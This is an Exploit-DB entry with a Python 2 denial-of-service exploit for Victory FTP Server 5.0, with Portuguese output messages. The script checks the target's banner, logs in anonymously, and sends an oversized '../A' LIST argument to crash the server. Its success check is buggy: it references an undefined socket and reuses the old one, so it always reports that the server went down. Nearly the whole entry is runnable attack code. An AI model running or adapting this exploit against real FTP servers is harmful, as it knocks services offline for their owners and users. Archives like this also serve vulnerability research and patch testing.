Victory FTP Server 5.0 - Denial of Service Exploit

2011-02-24T00:00:00
ID EDB-ID:16230
Type exploitdb
Reporter C4SS!0 G0M3S
Modified 2011-02-24T00:00:00

Description

Victory FTP Server 5.0 - Denial of Service Exploit. Dos exploit for windows platform

                                        
                                            #!/usr/bin/python
#
#
#       xxx     xxx        xxxxxxxxxxx        xxxxxxxxxxx        xxxxxxxxxxx
#        xxx   xxx        xxxxxxxxxxxxx      xxxxxxxxxxxxx      xxxxxxxxxxxxx  
#         xxx xxx         xxxxxxxxxxxxx      xxxxxxxxxxxxx      xxxxxxxxxxxxx                    
#          xxxxx          xxx       xxx      xxx       xxx      xxx       xxx           xxxxxx   
#           xxx           xxx       xxx      xxx       xxx      xxx       xxx          xxxxxxxx  xxxxxxxx  xxxxxxxxx
#         xxxxxx          xxx       xxx      xxx       xxx      xxx       xxx          xx    xx  xx    xx  xx
#        xxx  xxx         xxx       xxx      xxx       xxx      xxx       xxx          xx    xx  xx xxxx   xx  xxxxx
#      xxx     xxx        xxxxxxxxxxxxx      xxxxxxxxxxxxx      xxxxxxxxxxxxx   xxx    xxxxxxxx  xx   xx   xx     xx
#     xxx       xxx        xxxxxxxxxxx        xxxxxxxxxxx        xxxxxxxxxxx    xxx     xxxxxx   xx    xx  xxxxxxxxx
#
#
#[+]Exploit Title: Exploit Denial of Service VicFTPS
#[+]Date: 02\24\11
#[+]Author C4SS!0 G0M3S
#[+]Software Link: http://vicftps.50webs.com/VicFTPS-5.0-bin.zip
#[+]Version: 5.0
#[+]Tested On: WIN-XP SP3
#[+]CVE: N/A
#[+]Language: Portuguese
#
#
#Author C4SS!0 G0M3S || Cassio Gomes
#E-mail Louredo_@hotmail.com
#Site www.x000.org/
#
#


import socket
import time
import os
import sys

if os.name == 'nt':
    os.system("cls")#SE FOR WINDOWS
    os.system("color 4f")
else:
    os.system("clear")#SE FOR LINUX


def usage():
    print """
          ============================================================
          ============================================================
          ===============Exploit Denial of Service Vicftps 5.0========
          ===============Autor C4SS!0 G0M3S || C\xe1ssio Gomes==========
          ===============E-mail Louredo_@hotmail.com==================
          ===============Site www.x000.org/===========================
          ============================================================
          ============================================================
"""
         

if len(sys.argv)!=3:
    usage()
    print "\t\t[-]Modo de Uso: python %s <Host> <Porta>" % sys.argv[0]
    print "\t\t[-]Exemplo: python %s 192.168.1.2 21" % sys.argv[0]
    sys.exit(0)
buf = "../A" * (330/4)
usage()
print "\t\t[+]Conectando-se Ao Servidor %s\n" % sys.argv[1]
time.sleep(1)
try:
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((sys.argv[1],int(sys.argv[2])))
    print "\t\t[+]Checando se o Servidor e Vulneravel\n"
    time.sleep(1)
    banner = s.recv(2000)
    if((banner.find("VicFTPS"))!=-1):
        print "\t\t[+]Servidor e Vulneravel:)\n"
        time.sleep(1)
    else:
        print "\t\t[+]Sinto Muito, Servidor Nao e Vulneravel:(\n"
        time.sleep(1)
    print "\t\t[+]Enviando Exploit Denial of Service\n"
    time.sleep(1)
    
    s.send("USER anonymous\r\n")
    s.recv(2000)
    s.send("PASS\r\n")  
    s.recv(2000)
    s.send("LIST "+buf+"\r\n")
    print "\t\t[+]Exploit Enviado Com Sucesso ao Servidor "+sys.argv[1]+"\n"
    time.sleep(1)
    print "\t\t[+]Checando Se o Exploit Funcionou\n"
    time.sleep(1)
    try:
       sock = socket.socket(socket.AF_INET,sock.SOCK_STREAM)
       s.connect((sys.argv[1],int(sys.argv[2])))
       print "\t\t[+]Sinto Muito o Exploit Nao Funcionou:(\n"
       time.sleep(1) 
       sys.exit(0)
    except:
        print "\t\t[+]Exploit Funcionou, Servidor Derrubado:)\n"
        time.sleep(1)
    
    
except:
    print "\t\t[+]Erro ao Se Conectar no Servidor "+sys.argv[1]+" Na Porta "+sys.argv[2]+"\n"